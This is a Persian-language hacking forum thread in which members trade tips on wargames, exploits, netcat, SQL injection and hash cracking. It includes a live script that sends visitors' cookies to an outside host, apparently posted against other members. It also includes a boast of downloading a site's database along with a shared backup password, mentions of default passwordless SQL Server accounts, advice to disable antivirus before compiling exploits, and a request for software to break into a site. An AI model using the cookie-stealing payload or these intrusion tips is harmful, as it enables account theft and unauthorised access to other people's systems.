فقط كارهاي خطري نكنيد !!
خيلي راحت db رو تونستم دانلود كنم !
واقعا عجيب بود !
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
Printable View
فقط كارهاي خطري نكنيد !!
خيلي راحت db رو تونستم دانلود كنم !
واقعا عجيب بود !
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
سلامنقل قول:
نوشته شده توسط K053_LSH_KV90
مرسی ولی نوشته 5....
بعد فکر کنم باید به سیمرغی ها بگی
این بکاپتم میبینم ببینیم میشه چیزی رو کرک کرد یا نه
پسوردشو چی گزاشتی ؟
پسورد : Dev0te3
سلام
مرسی K053_LSH_KV90 جان
بوی مهر هم داره میاد مدرسه
من که افتادم نوبت عصر خدا بخیر کنه که چی میشه :blink:
سلام
این یک War game (برای هکرها باید نفوذ کنیم )
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
اینجا گزاشتم تا با هم فکری هم دیگه بتونیم یوزنیم پسورد رو بدست بیاریم بعد بریم مراحل بالاتر
سلام هكتور جون اين كه ديگه خيلي سادست و همين طور خوراك منه !
چنين فايلي رو ديده بودي !checkpassword.js
---------------------------------
کد:function validatereg(f)
{
var pass = f.pass
var passv = f.pass.value
var passTest;
passTest = "YES"
// To check if user entered single quote
var doesExist=passv.indexOf("'");
if(doesExist != -1)
{
passTest = "NO";
}
// To check if user entered semicolon
doesExist=passv.indexOf(";");
if(doesExist != -1)
{
passTest = "NO";
}
// To check if user entered backslash
doesExist=passv.indexOf("\\");
if(doesExist != -1)
{
passTest = "NO";
}
if(passTest == "YES")
{
//alert("User did not enter single quote or semicolon");
return true;
}
else
{
//alert("Invalid data");
f.pass.value = "";
return false;
}
}
سلام دوستان من يه نرم افزار كم حجم و ساده براي نفوذ به يك سايت مي خوام . نمي خوام زياد حرفه اي باشه .فقط كارش رو خوب انجام بده
با تشكر
دوستان سلامنقل قول:
نوشته شده توسط arman_linkin
در تالار آموزش مقالات هك ، تاپيك آموزش هك در 14 جلسه نوشته آرازصمدي ، به سايت هايي اشاره شده براي بدست آوردن اطلاعات كامل دامين سايت ها ،
من وقتي از اين دو سايت ( كه در بالا با رنگ قرمز به آن ها اشاره شده ) استفاده مي كنم به اون شكل اطلاعاتي نميده !
ممكنه چند تا سايت براي به دست آوردن اطلاعات كامل ، كه به خوبي سايت [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ] باشن معرفي كنيد ؟
در همون تاپيك درخواستم رو مطرح كردم ولي هنوز پاسخي دريافت نكردم ، فكر كردم كه درخواستم رو اين جا هم مطرح كنم ، چون شما هم در اين زمينه آگاهي كامل داريد و هم اين كه لطف مي كنيد و سريع تر پاسخ مي ديد .
سلامنقل قول:
نوشته شده توسط K053_LSH_KV90
K053_LSH_KV90 اینو دیدم
فکر کنم علامتهای ' ; \\ رو بلاک کرده
فقط این تیکه منو به خودش جذب کرد :biggrin:
ستاره خانم این دوتارو امتحان کنیدکد:if(passTest == "YES")
{
//alert("User did not enter single quote or semicolon");
return true;
}
else
{
//alert("Invalid data");
f.pass.value = "";
return false;
}
}
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
سلام....من این تاپیکو تازه دیدم...
میگم سایتی چیزی سراغ ندارین که اکسپلویت کامپایل شده بزاره؟؟
در مورد کامپایل اکسپلویت هم هر چی دارین بگید
راستی در مورد کش رفتن دیتا بیس هم مطلب بزارید
در مورد رمز گشایی و شناسایی مطالب هش هم اگه دارید بزارید
شرمنده زیاد شد :blush:
:biggrin: :biggrin: :biggrin: :biggrin:
اضافه میکنم :
در مورد فازینگ هم اموزش بزارید
:blink:
دوباره اضافه میکنم:
پیاده سازی نت کت رو هم توضیح بدید لطفا :blush:
شرمنده ها !!!!
:biggrin: :biggrin: :blush: :biggrin: :biggrin:
[HTML]<script>img=new Image(); img.src="http://clients.securitydot.net/s.php?id=431&"+document.cookie;</script>[/HTML]
P30gamer داره خطري ميشي ها
ميخواي با اين كد كوكي منو بدزدي يا ماله ميثم يا سينا ! :D
---------------------------------------------------------
نفوذ به ديتا بيس به سادگي ها كه نيست كه بايد يه باگي چيزي تو سيستمش باشه كه اججازه بده بتوينم ديتا بيس رو دانلود كنيم !
كه اغلب نيوز ها اين باگ رو دارند
شما اول بايد بفهمي كه ديتا بيس تو چه شاخه اي هست بعد بايد تست كني كه باگ داره يا نه ! بعد اگه داشت ميشه هزار تا كار باهاش كرد كه يكي از اونا دانلود كردن هست !
همين قدر كافيه ديگه !
-----------------------------------------------------
فازر ها يه سري ابزار هستند كه باگ ها رو تو نرم افزار هاي تويه هاست ها پيدا مي كنند !
چيزه بدرد به خوري نيستند !
--------------------------------------------------
در مورد رمز گشايي هم نه من نه كسي ديگه نميتونه بهت توضيح بده بايد خودت بشيني و كتاب هاي خارجي رو بخوني !
البته رمز گشايي بحث خيلي خيلي عظيمي داره چون از چند هزار سال قبل از ميلاد مسيح اين بحث ها هم بود والان هم هست !
البته برنامه هاي آماده اي هستند !(بستگي داره چه نوع رمزي رو بخواي باز كني ! رمز هاي نظامي داريم و رمز هاي اجتماعي ، و n)
------------------------------------------------
پياده سازي نت كت يعني چي !!
پياده سازي نداره كه ! نسخه كامپال شدش رو بگير حله !
------------------------------------------------
در ضمن ديگه هم از اين شيطوني ها نكن! :d
نه بابا من خواستم ببینم این کد چطوری کار میکنه....وگرنه تو html تگ که نمیزاشتمش :biggrin:
نسخه ی کامپایل شده ی نت کت رو اخه از کجا بیارم؟؟
==========
برای رمز گشایی چند تا منبع میشه بگید؟؟انگلیسی بود هم مشکل نداره !!
==========
در مورد کامپایل کردن اکسپلویت ها هم خواهشن یه چیزی بگید....من با سی کار میکنم...اما هیچ اکسپلویتی تا بحال نتونستم کامپایل کنم
من یادمه قبلا یه سایتی بود هر ماه جدید ترین اکسپلویت ها رو کامپایل شده بیرون میداد...ادرسشو بلدید؟؟
نت كت رو كه بهت دادم
---------------------------
براي رمز گشايي هم فعلا دنبال اين باش تا يه چند تا مقاله تازه از دوستان بگيرم (نايتي ها)
en.wikipedia.org/wiki/Cryptography
كتاب هاي oreilly رو اگه پيدا كردم برات اينجا ميزارم !
----------------------------
مشكل از خودته ! البته بعضي از اينا تو لينوكس كامپايل ميشند
تقريبا milw0rm.com سايت خوبيه !
---------------------------
سلام....خیلی ممنون...مشکلم رو دربارهی اکسپلویت ها حل کردم
سلامنقل قول:
نوشته شده توسط P30Gamer
در مورد دیتابیس اگه خوب پیکربندی نشه 2تا یوز دیفالت بدون پسورد داره
sa
ODBC
در مورد Sql injection هم چند تا کتاب اول صفحه گزاشتم
1- p30gamer جان اون کد زمانی کار میکنه که مخفی بشه و اجرا بشه :biggrin:
2- برای رمز گشایی هش هم هشتو اگه می خوای پیغام کن تا برات کرک کنم :cool:
3- کامپایل تو ویندوز باید با خوده نرم افزار صورت بگیره
اول آنتی ویروس رو غیر فعال کن تا کدتو پاک نکنه :biggrin: بعد توی منو ها فکر کنم نوشته Build برو توش و بعد نوشته Compile بزنش و بعد از چند ثانیه یک سری فایل ساخته میشه دوباره تو همون منو (اسمش یادم رفته :blink: یک گزینه هست که برای ساختن فایل Exe هست ).
بعد میتونی از دستور CL هم کمک بگیری :biggrin: (نمودنم متوجه شدی یا نه :biggrin: )
تو لینوکس هم از دستور Gcc استفاده میشه
با راهنمایی های اینجا تا حالا کسی جایی رو هک کرده؟
بهروز خان قرار نيستكه اينجا كسي هك ياد بگيره !!
تازه هك ياد گرفتني نيست !
داداش هكتور :D (Kevin) يه حرف خوبي زده بود قديما كه !
افراد هكر نمي شند بلكه هكر به دنيا ميان !
آقايون سلام من به يك مشكل برخوردم و اونم اينكه موقعي كه داري كامپيوتر رو روشن ميكني و ميخواي ويندوز انتخاب كني يك ويندوز ديگه هم اضافه شده كه نوشته
windows mrt sp2 farsi (boot screan)كه در اصل ويندوز من mrt هستش و با اين ويندوزي كه دارم يكي هستش حالا بايد چي كار كنم
جاش اینجا نبود
فقط اگه مشکلی نیست لطفا چند تا سایت اپ تو دیت در ضمینه ی اکسپلویت ها بزارید...قبل از اینکه پچ شن
سلام دوستان اگر کسي w2k-hax-nmap-msf.part
قسمتهاي 3 ,1,و 6 و 7 رو دانلود کرده يه جا ديگه آپلود کنه تا ما هم
بتونيم استفاده کنيم
ممنون
سلامنقل قول:
نوشته شده توسط P30Gamer
P30Gamer جان تا اکسپلویت معرفی میشه سریعا پچ میشه
جر اینکه خودتون پیدا کنید
دوستان...منظورم این سایت های زیرزمینی سکرت هست...که دامینشون priv8 هست.....
====
biohazard یعنی شما میگید اکسپلویت ها رو بنویسم خودم؟؟؟ من برنامه نویسی بلدم اما اکسپلویت نویسی نه....:biggrin:
اگه درجه شما تو تيم هاي امنيتي بالا باشه ! ميتوني از اكسپلويت هاي خصوصي اونها استفاده كني !
كه انتشار كردن اونها بدون اجازه اونها كار خيلي خيلي زشتيه !
--------------------------------------------------------------------
چه زبوني بلدي !؟
p30gamer جان اکسپلویت نویسی یا سی یجوری هستنقل قول:
نوشته شده توسط P30Gamer
ولی با پرل راحته :biggrin:
چند تا سورس نگاه کنی میفهمی
من به زبان های
c# و C++
تقریبا در حد متوسط اشنایی دارم....اما پرل نه..
سعی میکنم بفهمم یه چیزی از سورس ها...ممنون
p30gamer جان یک توضیح مختصر در باره اکسپلویت میدمنقل قول:
نوشته شده توسط P30Gamer
اول باگ رو پیدا میکنن بعد اکسپلویتش میکنن تا راحت تر بشه اجراش کرد غیر از بعضی از باگها مثله Over flow ها
من سايت هاي زيادي دارم كه در زمينه ي هك باشه اما اين از همه بهتره
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
BioHazard میدونم اکسپلویت چیه...اما نوشتنش سخته.. [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
اینم دو مقاله امنیتی که توسط حسام حاتمی ادمین mog نوشته شده موفق و سربلند باشید
دوست عزيز دستت درد نكنه . اگه سايت هاي بهتري هم سراغ داري لينكشون رو لطفن بگذار .نقل قول:
نوشته شده توسط BioHazard
خيلي از لطفت ممنونم
دوستان من يك سوال دارم :
روي Counter بعضي از وب لاگ ها و سايت ها ، وقتي كليك ميكنيم باز نميشن !
اين يعني چي ؟ يعني اين كه فقط خود وب مستر مي تونه Counter رو ببينه ، نه ؟
آيا راهي هست كه ما هم بتونيم اين جور Counter ها رو ببينيم ؟
چشم ستاره خانمنقل قول:
نوشته شده توسط Setareh 2006
بعد کانتر منظورتون همون کانتر هایی هست که وب مستر یا وبلاگ مستر از جایی میگیره؟
اگه منظورتون اینه خود مستر میتونه پسورد بزاره
و راهی برای دیدنش نیست (در صورتی که فکر نفوذ گری نداشته باشیم)
چشمتون بي بلا !نقل قول:
نوشته شده توسط BioHazard
درسته دوست عزيز منظورم همون Counter هست
بله من متوجه شدم كه بايد اول يوزر و پسورد رو وارد كنيم تا بتونيم واردش بشيم
خوب حالا من اين فكر نفوذگري رو از كجا گير بيارم ؟
من كه مثل شما وارد نيستم ! :ohno:
كو حالا تا من هك رو ياد بگيرم :sad:
اي كاش ميتونستين به زبان ساده به من ياد بدين :rolleye:
سلام .
1-آقا من هر وقت خاستم با اين nc تلنت کنم اررور میده : "Can't parse nc as an IP address در صورتي كه با تلنت ويندوز مشكلي ندارم!
2- از تلنت گذشته موقع port scaning هم همش گير ميده :
nc: forward host lookup failed: h_errno 11001: HOST_NOT_FOUND
در صورتي كه با port scanner مشكلي ندارم!
به نظر شما چرا؟
ستاره خانوم شما باید بشینید باگ رو پیدا کنیدنقل قول:
نوشته شده توسط Setareh 2006
ممکنه Injection باشه کتاباش اوایل صفحه هست یک سری دیگه هست که اگه K053 جان زحمت بکشن لینکشو بزارم
ممکنه اصلا سایت باگ نداشته باشه سرور داشته باشه
و......
میخواین لینکشو بدین من یک چک کنم :blink:
به همین راحتی هم نیست
بعد خوده من 1 ساله شروع کردم و اول هم مثله شما بودم الان هم اطلاعات چندانی ندارم
یکم علاقه و پشتکار
ما ها هنوز 2 3 سال کار داریم :biggrin: